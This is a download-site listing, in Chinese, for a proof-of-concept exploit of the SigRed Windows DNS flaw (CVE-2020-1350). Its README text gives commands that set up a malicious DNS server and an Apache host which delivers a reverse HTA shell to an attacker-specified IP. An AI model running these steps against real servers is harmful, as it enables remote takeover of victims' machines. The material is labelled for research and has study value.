SIGRed_RCE_PoC 源码

overwhelming_76711 5 0 ZIP 2021-04-24 17:04:00

适用于CVE-2020-1350,SigRed的PoC远程代码执行漏洞利用。 创建人: 仅用于研究目的。 使用风险自负。 利用写作 有关使用的方法的详细信息在这里: 实验室环境设置 攻击者将建立一个邪恶域,其NS记录指向恶意服务器(攻击者计算机)。 出于演示/测试目的,只需在受害者计算机上设置条件转发器即可将“恶意域”请求转发到攻击者计算机。 工具-> DNS 在Linux攻击者机器上:(我使用了基本的Ubuntu 20.04.1 VM) sudo python3 configure.py -ip IP_ATTACKER -p PORT_REVERSE_SHELL -hp PORT_APACHE_SERVER (default 80) 这会将受害者配置为下载反向HTA Shell的Apache服务器。 运行漏洞利用 sudo python3 evildns.py 需要su

用户评论
请输入评论内容
评分:
暂无评论